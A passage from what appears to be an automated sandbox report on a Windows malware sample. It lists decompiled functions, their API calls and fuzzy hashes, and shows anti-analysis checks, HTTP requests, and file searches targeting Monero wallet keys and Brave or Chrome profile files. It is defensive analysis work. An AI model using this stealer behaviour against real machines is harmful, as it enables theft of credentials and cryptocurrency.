                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: de0ebee8f1eeab7780c1163b8fcfdcaee739e875360bb5644cb781515cfa9e08
                        • Instruction ID: 994ca084c27a4feb98da716d768832e92255c5b0aff7d40780a469e759a47275
                        • Opcode Fuzzy Hash: de0ebee8f1eeab7780c1163b8fcfdcaee739e875360bb5644cb781515cfa9e08
                        • Instruction Fuzzy Hash: 470162B0D45348BBEB10DBD4CC49B9DB779AB04701F208059E705BA2C0D7B55781875D
                        Function 006E6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1450 6e6af3 1451 6e6b0a 1450->1451 1453 6e6b0c-6e6b22 call 6e6920 call 6e5b10 CloseHandle ExitProcess 1451->1453 1454 6e6aba-6e6ad7 call 6eaad0 OpenEventA 1451->1454 1459 6e6ad9-6e6af1 call 6eaad0 CreateEventA 1454->1459 1460 6e6af5-6e6b04 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E48F98,?,006F110C,?,00000000,?,006F1110,?,00000000,006F0AEF), ref: 006E6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006E6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 006E6AF9
                        • Sleep.KERNEL32(00001770), ref: 006E6B04
                        • CloseHandle.KERNEL32(?,00000000,?,00E48F98,?,006F110C,?,00000000,?,006F1110,?,00000000,006F0AEF), ref: 006E6B1A
                        • ExitProcess.KERNEL32 ref: 006E6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 0ddc82d55d151674c111cbd59c3715e79f132e7ff74e4717d64382aa3c40341d
                        • Instruction ID: c1f0884149725e845958f23a902dddac38bff1a0df55009cd0995ba3b84ddb90
                        • Opcode Fuzzy Hash: 0ddc82d55d151674c111cbd59c3715e79f132e7ff74e4717d64382aa3c40341d
                        • Instruction Fuzzy Hash: C5F08930E46349EFE740ABA1DD16BFD7735FB14781F108528F513A11C1DBB05941EA56
                        Function 006D47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006D4839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 006D4849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 09d4f76c86cf7483047ba0053cd3ce70ca7b0114fa94e9e636f6b7c971649ece
                        • Instruction ID: 95e2f88ce8a667656303d91b7893444136394bc37342d7d3466ba4e01fd7247c
                        • Opcode Fuzzy Hash: 09d4f76c86cf7483047ba0053cd3ce70ca7b0114fa94e9e636f6b7c971649ece
                        • Instruction Fuzzy Hash: 63214FB1D01308ABDF14DFA5E845ADE7B75FB45320F108629F919A72C1EB706A05CF92
                        Function 006E51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D6280: InternetOpenA.WININET(006F0DFE,00000001,00000000,00000000,00000000), ref: 006D62E1
                          • Part of subcall function 006D6280: StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D6303
                          • Part of subcall function 006D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D6335
                          • Part of subcall function 006D6280: HttpOpenRequestA.WININET(00000000,GET,?,00E4E248,00000000,00000000,00400100,00000000), ref: 006D6385
                          • Part of subcall function 006D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006D63BF
                          • Part of subcall function 006D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006D63D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006E5228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: ac4a1aede1f3a2fe6592e75ecdac2862b6ce05673e8ca8f773544731b0a643c5
                        • Instruction ID: 972ba1513e05a50cb697e1740f68f1825be4727825d6aaae1ba0b5c9edbb781e
                        • Opcode Fuzzy Hash: ac4a1aede1f3a2fe6592e75ecdac2862b6ce05673e8ca8f773544731b0a643c5
                        • Instruction Fuzzy Hash: 93113370912288ABDB54FFA5DD92AED733BAF50340F41416CF90A4A192EF34BB06C695
                        Function 006E78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E7917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 006E792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: ee40c70c313b6df1c99a3c03e22cca1f4beb4f50d3500e16d6b1e271be186ba5
                        • Instruction ID: d06e591ecd4f36e49b65314c2c09da286cc798b7f9077de09a1bd0d6e3c88107
                        • Opcode Fuzzy Hash: ee40c70c313b6df1c99a3c03e22cca1f4beb4f50d3500e16d6b1e271be186ba5
                        • Instruction Fuzzy Hash: 080181B1A19348EBC700DF99DD45BAEBBB8FB04B21F10429AFA55E3280D3745901CBA1
                        Function 006D1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006D112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 006D1132
                        • ExitProcess.KERNEL32 ref: 006D1143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: d33ba071c5eaab3f9de98333b91fc3c784eddfb8fda34e3039c23ef60aed05e1
                        • Instruction ID: 6d2adf3b327092410a5fef3c7ec96993d3c64c4e47470a4a7c57d33c4d0fff70
                        • Opcode Fuzzy Hash: d33ba071c5eaab3f9de98333b91fc3c784eddfb8fda34e3039c23ef60aed05e1
                        • Instruction Fuzzy Hash: 76E08670E5A308FBE7106BA09C0AB487678AB04B11F108085F7087A2C0C6F42A00E699
                        Function 006D10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006D10B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006D10F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 2857094dfb43cdfbe2a1ed6948efee8c4a431d27bdba3eda0a79a1b9ee5bf1c3
                        • Instruction ID: cd384a4918487024af797f065baef95f133b717c824a65a4346b54637adbf227
                        • Opcode Fuzzy Hash: 2857094dfb43cdfbe2a1ed6948efee8c4a431d27bdba3eda0a79a1b9ee5bf1c3
                        • Instruction Fuzzy Hash: 71F0E2B1A42308BBE714AAA8AC49FEAB7E8E705B15F304449F504E7380D9719F00DAA4
                        Function 006D1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7910
                          • Part of subcall function 006E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006E7917
                          • Part of subcall function 006E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006E792F
                          • Part of subcall function 006E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006D11B7), ref: 006E7880
                          • Part of subcall function 006E7850: RtlAllocateHeap.NTDLL(00000000), ref: 006E7887
                          • Part of subcall function 006E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006E789F
                        • ExitProcess.KERNEL32 ref: 006D11C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 8b19427a109ce5bb78cd4d28e55469aaa274b8114427cd2374f5c6f8e6d0accb
                        • Instruction ID: 88323205bc1f9735009450a77c5ae988eedda20c744a64502efb32bbd1af17e6
                        • Opcode Fuzzy Hash: 8b19427a109ce5bb78cd4d28e55469aaa274b8114427cd2374f5c6f8e6d0accb
                        • Instruction Fuzzy Hash: DBE08CA1E2A30126CA4033B6BC0AB6E328E5B60345F040439BA0982202FA24EC00C56A

                        Non-executed Functions

                        Function 006E38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 006E38CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 006E38E3
                        • lstrcat.KERNEL32(?,?), ref: 006E3935
                        • StrCmpCA.SHLWAPI(?,006F0F70), ref: 006E3947
                        • StrCmpCA.SHLWAPI(?,006F0F74), ref: 006E395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006E3C67
                        • FindClose.KERNEL32(000000FF), ref: 006E3C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 1d0def47f86f6fa33bcccde3e88c5bf92e5e864645db59610ab5fbbbc5a51753
                        • Instruction ID: bbc0924739053b5994497edc865896e2607eb0e7a0842d9eb5e73bdd661dc957
                        • Opcode Fuzzy Hash: 1d0def47f86f6fa33bcccde3e88c5bf92e5e864645db59610ab5fbbbc5a51753
                        • Instruction Fuzzy Hash: D1A153B1A11358ABDB64DFA5DC89FFA7379BF44300F048588A60D97241EB749B84CF62
                        Function 006DBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • FindFirstFileA.KERNEL32(00000000,?,006F0B32,006F0B2B,00000000,?,?,?,006F13F4,006F0B2A), ref: 006DBEF5
                        • StrCmpCA.SHLWAPI(?,006F13F8), ref: 006DBF4D
                        • StrCmpCA.SHLWAPI(?,006F13FC), ref: 006DBF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DC7BF
                        • FindClose.KERNEL32(000000FF), ref: 006DC7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 758aa09309855f0c86580b613ca30226315d71084eb7e452092736cd42ba38ef
                        • Instruction ID: f6a1da02e99e775b48de340b0c88284c9cadff69427243cbb701f3f085a39d8f
                        • Opcode Fuzzy Hash: 758aa09309855f0c86580b613ca30226315d71084eb7e452092736cd42ba38ef
                        • Instruction Fuzzy Hash: D342B572911248ABDB54FBB1DC96EEE733FAF84300F41455CB90696181EE30AF49CB96
                        Function 006E4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 006E492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 006E4943
